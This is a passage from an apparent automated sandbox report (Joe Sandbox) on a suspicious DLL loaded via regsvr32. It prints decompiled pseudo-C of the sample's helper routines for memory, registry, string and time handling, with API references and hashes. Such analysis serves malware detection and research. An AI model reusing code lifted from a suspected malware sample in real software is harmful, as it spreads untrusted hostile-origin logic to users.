Sleep.KERNEL32(0000000A,?,?,007A2F44,?,?,?,?,?,007A44F9,?,00000001), ref: 007A603A
HeapFree.KERNEL32(00000000,00000000,?,?,007A2F44,?,?,?,?,?,007A44F9,?,00000001), ref: 007A6062
RtlLeaveCriticalSection.NTDLL(052995F0), ref: 007A607E

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 59c4e4894746b79a998710183af0d230b95b1f802bb91712eefd1dc6f10defa6
Instruction ID: 0f67e37ffeeb43d29ca0808ae14738663981fd2aee87b7fbc2dda79c3167c417
Opcode Fuzzy Hash: 59c4e4894746b79a998710183af0d230b95b1f802bb91712eefd1dc6f10defa6
Instruction Fuzzy Hash: DDF05834200201EBEB21CF38EC48F0B77A4ABC7780B08C105FA45D6260C33CE864CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 007A1547, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A1547() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x7aa2c4; // 0x2ec
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x7aa304; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x7aa2c4; // 0x2ec
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x7aa290; // 0x4ea0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x007a1547
0x007a154e
0x007a1598
0x007a159a
0x007a159a
0x007a1552
0x007a1558
0x007a155d
0x007a1561
0x007a1567
0x007a156e
0x00000000
0x00000000
0x007a1570
0x007a1575
0x00000000
0x00000000
0x00000000
0x007a1575
0x007a1577
0x007a157f
0x007a1582
0x007a1582
0x007a1588
0x007a158f
0x007a1592
0x007a1592
0x00000000

APIs

SetEvent.KERNEL32(000002EC,00000001,007A4214), ref: 007A1552
SleepEx.KERNEL32(00000064,00000001), ref: 007A1561
CloseHandle.KERNEL32(000002EC), ref: 007A1582
HeapDestroy.KERNEL32(04EA0000), ref: 007A1592

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 541bd59d575949ce67e3176e1db6d8306a708965b79597b00def52dccb13d8cc
Instruction ID: de6e79ee519e45daac3351f61f78ca49094962031c05e63a9c116f7da233f81d
Opcode Fuzzy Hash: 541bd59d575949ce67e3176e1db6d8306a708965b79597b00def52dccb13d8cc
Instruction Fuzzy Hash: 0EF03031F40312ABEB205B74ED0CB5B37ACBBD7752B448614B91AD71D0DB2CC920CA55

Uniqueness

Uniqueness Score: -1.00%

Function 007A461D, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E007A461D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x7aa37c; // 0x5299630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x7aa37c; // 0x5299630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x7aa37c; // 0x5299630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x7ab882) {
					HeapFree( *0x7aa290, 0, _t10);
					_t7 =  *0x7aa37c; // 0x5299630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x007a461d
0x007a4626
0x007a4636
0x007a4636
0x007a463b
0x007a4640
0x00000000
0x00000000
0x007a4630
0x007a4630
0x007a4642
0x007a4647
0x007a464b
0x007a465e
0x007a4664
0x007a4664
0x007a466d
0x007a466f
0x007a4673
0x007a4679

APIs

RtlEnterCriticalSection.NTDLL(052995F0), ref: 007A4626
Sleep.KERNEL32(0000000A,?,?,007A2F44,?,?,?,?,?,007A44F9,?,00000001), ref: 007A4630
HeapFree.KERNEL32(00000000,?,?,?,007A2F44,?,?,?,?,?,007A44F9,?,00000001), ref: 007A465E
RtlLeaveCriticalSection.NTDLL(052995F0), ref: 007A4673

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 9a412e19b1894bc951d43164dac4c61bbb0d796c7d9a7777d982681fa5c3f8b2
Instruction ID: 8db9c3db439b2797cf463a81c82b8711e3cb3580ad67f6a0b8eb1a787238d2f9
Opcode Fuzzy Hash: 9a412e19b1894bc951d43164dac4c61bbb0d796c7d9a7777d982681fa5c3f8b2
Instruction Fuzzy Hash: 9DF07474600201EBEB19CF64EC59F1677A5ABDB781B05C219FA0697360C77DAC10CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DAAB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6D4DAC20

Strings

<(Pm, xrefs: 6D4DAC2B
ror, xrefs: 6D4DAAE6

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ___std_exception_copy
String ID: <(Pm$ror
API String ID: 2659868963-41268868
Opcode ID: 966ee975c3b5f3a4e84d5b9a4e35da1e41acf5d4b045e71224632e3ea29cf407
Instruction ID: ae9e63782f77de96b7dbb02a5cb8ea27e6947205f72484eed556feca819f5874
Opcode Fuzzy Hash: 966ee975c3b5f3a4e84d5b9a4e35da1e41acf5d4b045e71224632e3ea29cf407
Instruction Fuzzy Hash: 2651E371E002489FDB14CFA8C994FAEBBB5FF59314F10861DE415AB781E734A981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DF2D2, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6D4DF315, 6D4DF31C, 6D4DF352

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: dcde4c5a45d6d83b7da112a86d4e4c58b6338dcdfb7da2fa392839708ae48de0
Instruction ID: dcfa42301ab0a8c8956bc2f256245151bf5792ca795e8657f5b9126778770e33
Opcode Fuzzy Hash: dcde4c5a45d6d83b7da112a86d4e4c58b6338dcdfb7da2fa392839708ae48de0
Instruction Fuzzy Hash: 00419371A05695AFDF62CF99CC91EAEBBF8EF85350B2240AAE510D7310D7708E45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD300, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6D4DD33F
__IsNonwritableInCurrentImage.LIBCMT ref: 6D4DD3F3

Strings

csm, xrefs: 6D4DD3DD

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ae63e5f0eb34858746e546229bc7f86adcd5062bd4ac9f53f2e4f3b5cfb33089
Instruction ID: 38b25a93d7347d3eb3b07846872bbac7af8c1b27bf1d54b5ff3a03e315aa8e16
Opcode Fuzzy Hash: ae63e5f0eb34858746e546229bc7f86adcd5062bd4ac9f53f2e4f3b5cfb33089
Instruction Fuzzy Hash: FB41A534A04319ABCF40DF68C890E9EBBB5BF85318F158069E9149B391D731ED11CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E14AA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E1253: GetOEMCP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E127E

_free.LIBCMT ref: 6D4E1522

Strings

+?Nm, xrefs: 6D4E14DC

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: _free
String ID: +?Nm
API String ID: 269201875-616114912
Opcode ID: 745cea63aa7fa34a5145602f00bca28f6ececf98b92e613dbe73eca86c9aa858
Instruction ID: 4156e603aa3197cbddcaf9608e4ea8f09e4f836a93d8cef9d94d13628f9a5607
Opcode Fuzzy Hash: 745cea63aa7fa34a5145602f00bca28f6ececf98b92e613dbe73eca86c9aa858
Instruction Fuzzy Hash: E031C17290820ABFCB01DFA8C880F9A77F5AF44356F154169E9269B290EB31DD40CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007A7360, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E007A7360(void* __ecx, intOrPtr _a4) {
				char _v8;
				char _v12;
				long _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _t35;
				intOrPtr _t47;
				void* _t51;
				void* _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t53 =  *0x7aa0ec(0x80000003, 0, 0, 0x20019,  &_v32);
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E007A5C4E(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t53 =  *0x7aa0ac(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0);
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E007A2A03(_v28);
							goto L17;
						}
						_t53 = E007A202E(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4);
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E007A2A03(_v24);
						_v20 = _v16;
						_t47 = E007A5C4E(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x7aa2c4, 0) == 0x102);
				goto L16;
			}

0x007a7360
0x007a737a
0x007a737d
0x007a7380
0x007a7383
0x007a738c
0x007a7390
0x007a746a
0x007a746e
0x007a746e
0x007a7399
0x007a73a0
0x007a73a7
0x007a73aa
0x007a745f
0x007a7462
0x00000000
0x007a7468
0x007a73b0
0x007a73b3
0x007a73ba
0x007a73c4
0x007a73d3
0x007a73db
0x007a7413
0x007a744d
0x007a7453
0x007a7455
0x007a7455
0x007a7457
0x007a745a
0x00000000
0x007a745a
0x007a742d
0x007a7431
0x00000000
0x00000000
0x00000000
0x007a7431
0x007a73e0
0x007a73ef
0x00000000
0x00000000
0x007a73f4
0x007a73fd
0x007a7400
0x007a7407
0x007a740a
0x007a73e5
0x007a73e5
0x00000000
0x007a73e5
0x007a740e
0x00000000
0x007a740e
0x007a73e2
0x00000000
0x007a7433
0x007a7440
0x00000000

APIs

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

WaitForSingleObject.KERNEL32(00000000,?,?,?,007A7319,?,007A7319,?,?,?,?,?,007A7319,?), ref: 007A743A
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,007A7319,?,?,?,?,?,007A1C40,?), ref: 007A7462

Strings

~z, xrefs: 007A7386

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: AllocateCloseHeapObjectSingleWait
String ID: ~z
API String ID: 1423275866-3848100038
Opcode ID: 44f6559765b0cc0a9c8b63ceb1c9c7952db6b4adf4be8671627d96b684d15364
Instruction ID: 44714c8d81af935fc35e7e9142adb466fb23f516f7eb0de3134dc29b98592830
Opcode Fuzzy Hash: 44f6559765b0cc0a9c8b63ceb1c9c7952db6b4adf4be8671627d96b684d15364
Instruction Fuzzy Hash: DC313C71D04159EBCF21ABA5DC499EEFFB9EBCA310F118266E911B2160D2790E40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007A23AE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 007A23D6

Part of subcall function 007A7471: SysFreeString.OLEAUT32(?), ref: 007A7550

SafeArrayDestroy.OLEAUT32(?), ref: 007A2423

Strings

-tz, xrefs: 007A23BD

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID: -tz
API String ID: 3098518882-878127217
Opcode ID: 7f45170c4442020b27e7b62f7c178f09a571773544f470590a766e071ab73a28
Instruction ID: 2c1e165a649542b4c8cf466a8503bf49ad8df7972791649a24829ef5762bbc46
Opcode Fuzzy Hash: 7f45170c4442020b27e7b62f7c178f09a571773544f470590a766e071ab73a28
Instruction Fuzzy Hash: EE11307290010ABFDF01DF98CC45EEEBBB9EB49350F008155FA01A6161E3799A15DB95

Uniqueness

Uniqueness Score: -1.00%

Function 007A31C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 007A31DA

Part of subcall function 007A7471: SysFreeString.OLEAUT32(?), ref: 007A7550

SysFreeString.OLEAUT32(00000000), ref: 007A321A

Strings

-tz, xrefs: 007A31CB

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID: -tz
API String ID: 986138563-878127217
Opcode ID: 8c95b3a6f314cb0052f87be0207bf2a7bef1d600820c92817a7b4cae1d973de0
Instruction ID: 87771a8096c28c35e1b6fb4fb1632a03949f6f70e021495a0efe447cd861226a
Opcode Fuzzy Hash: 8c95b3a6f314cb0052f87be0207bf2a7bef1d600820c92817a7b4cae1d973de0
Instruction Fuzzy Hash: B1016D7250010ABBCB119FA8DC48DEFBBB8FFC9350F018121FA05A6161E7789A15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1253, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E127E
GetACP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E1295

Strings

+?Nm, xrefs: 6D4E12A2

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID:
String ID: +?Nm
API String ID: 0-616114912
Opcode ID: bfb02778c3c858c95d9032882147d88b9e6735249fff4f951ca021d7a973990b
Instruction ID: 7934ce9d13a9bf059e9a92883a9c71212572c48ea2739427429b2bae24d8c62b
Opcode Fuzzy Hash: bfb02778c3c858c95d9032882147d88b9e6735249fff4f951ca021d7a973990b
Instruction Fuzzy Hash: 08F04F30944605ABDF12DBA8C84AF6C77B0BB823AAF250748E534DEAD2C7719D85C781

Uniqueness

Uniqueness Score: -1.00%

Function 007A110A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
registryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E007A110A(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _t11;
				void* _t15;

				_t11 =  *0x7aa0c0(_a4, _a12,  &_a12);
				_t15 = _t11;
				if(_t15 == 0) {
					_t15 =  *0x7aa0c8(_a12, _a16, _t11, _a8, _a20, _a24);
					RegCloseKey(_a12);
				}
				return _t15;
			}

0x007a1118
0x007a111e
0x007a1122
0x007a113d
0x007a113f
0x007a113f
0x007a1149

APIs

RegCloseKey.ADVAPI32(007A20DE,?,007A5C49,80000002,00000003,007A20DE,?,?,?,?,?,007A4BED,00000000,00000000,80000002,00000000), ref: 007A113F

Strings

"{z, xrefs: 007A1134
-tz, xrefs: 007A110D

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Close
String ID: "{z$-tz
API String ID: 3535843008-4086250413
Opcode ID: c07f043657638aa11d4e20c9601bdaa11c805885085984a3bd2a3329cc908b17
Instruction ID: 9a8dc64b9f0436851adef7c825dc0adf0594c4f6b3b5389d05f5c03631dc9696
Opcode Fuzzy Hash: c07f043657638aa11d4e20c9601bdaa11c805885085984a3bd2a3329cc908b17
Instruction Fuzzy Hash: 43E0C27240021EBFCF525F90EC088EB3B6AFB49391B008420FE1192220E736C930EB95

Uniqueness

Uniqueness Score: -1.00%

Function 007A2956, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
timeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E007A2956(void* __ecx) {
				struct _FILETIME _v12;
				void* _t6;

				GetSystemTimeAsFileTime( &_v12);
				_t3 =  &(_v12.dwHighDateTime); // 0x7a61ef
				_push(0);
				_t6 = _v12.dwLowDateTime + 0x2ac18000;
				_push(0x989680);
				asm("adc ecx, 0xfe624e21");
				_push( *_t3);
				_push(_t6);
				L007A7F50();
				return _t6;
			}

0x007a295f
0x007a2968
0x007a296b
0x007a296d
0x007a2972
0x007a2977
0x007a297d
0x007a297e
0x007a297f
0x007a2985

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,00000000,007A61EF), ref: 007A295F
_aulldiv.NTDLL(-2AC18000,az,00989680,00000000), ref: 007A297F

Strings

az, xrefs: 007A2968, 007A297D

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Time$FileSystem_aulldiv
String ID: az
API String ID: 2806457037-671569496
Opcode ID: 7ca6fa2b3e0cecd128255c5b1475e3605a94cb05ceac00d6aae414ce25e27781
Instruction ID: de35edb9daf2bb7db3ab49176b4d8c349361ab798bac032708ddcb3aaed829a0
Opcode Fuzzy Hash: 7ca6fa2b3e0cecd128255c5b1475e3605a94cb05ceac00d6aae414ce25e27781
Instruction Fuzzy Hash: 6CD09BB591430C7BDB04D7D0DC4AFDE776CD745649F040554B601A2641E574E6008724

Uniqueness

Uniqueness Score: -1.00%

Function 007A7B36, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A7B36() {

				E007A7C36(0x7a9324, 0x7aa0d0);
				goto __eax;
			}

0x007a7b0f
0x007a7b16

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007A7B0F

Part of subcall function 007A7C36: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007A7CAF

Strings

"{z, xrefs: 007A7B09
6{z, xrefs: 007A7B36

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: "{z$6{z
API String ID: 123106877-1684302835
Opcode ID: 7d0879bdaac7c77546174e85720e16e7ec5cd504064edd539adae4f2b2de6d14
Instruction ID: 930804c7605fa65b80735145c5d1edeb0e92434e42a811f299c525c8ee5a64ce
Opcode Fuzzy Hash: 7d0879bdaac7c77546174e85720e16e7ec5cd504064edd539adae4f2b2de6d14
Instruction Fuzzy Hash: 88B012C225D101FC365C530CAD0AD37425CC1C3B22330432AF005C4180E48C4C01D232

Uniqueness

Uniqueness Score: -1.00%

Function 007A2FFC, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E007A2FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E007A5C4E(_t2);
				if(_t34 != 0) {
					_t30 = E007A5C4E(_t28);
					if(_t30 == 0) {
						E007A2A03(_t34);
					} else {
						_t39 = _a4;
						_t22 = E007A79AC(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E007A79AC(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x007a2ffc
0x007a3006
0x007a3008
0x007a300e
0x007a300e
0x007a3017
0x007a301b
0x007a3027
0x007a302b
0x007a309f
0x007a302d
0x007a302d
0x007a3031
0x007a3038
0x007a303b
0x007a3055
0x007a3044
0x007a3044
0x007a3048
0x007a304b
0x007a3050
0x007a3050
0x007a305a
0x007a3082
0x007a3088
0x007a308b
0x007a305c
0x007a305e
0x007a3066
0x007a3071
0x007a3076
0x007a3076
0x007a3092
0x007a3099
0x007a309a
0x007a309a
0x007a302b
0x007a30aa

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,007A56E5,00000000,00000000,00000000,05299698,?,?,007A3B82,?,05299698), ref: 007A3008

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

Part of subcall function 007A79AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,007A3036,00000000,00000001,00000001,?,?,007A56E5,00000000,00000000,00000000,05299698), ref: 007A79BA
Part of subcall function 007A79AC: StrChrA.SHLWAPI(?,0000003F,?,?,007A56E5,00000000,00000000,00000000,05299698,?,?,007A3B82,?,05299698,0000EA60,?), ref: 007A79C4

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,007A56E5,00000000,00000000,00000000,05299698,?,?,007A3B82), ref: 007A3066
lstrcpy.KERNEL32(00000000,00000000), ref: 007A3076
lstrcpy.KERNEL32(00000000,00000000), ref: 007A3082

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 026e06cde063556ba286c9eef27a4fff4ff7fa129105e1c32d7962d7e9247faf
Instruction ID: b6621f7fe6465b8c9c594acaaf952ac7237c4bc951268a7dd0110b9427a3c47b
Opcode Fuzzy Hash: 026e06cde063556ba286c9eef27a4fff4ff7fa129105e1c32d7962d7e9247faf
Instruction Fuzzy Hash: 0121E432504215EFCB215F78CC48AAF7FB99F87380B058155F9049B212D739CA00C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 007A4DC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A4DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E007A5C4E(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
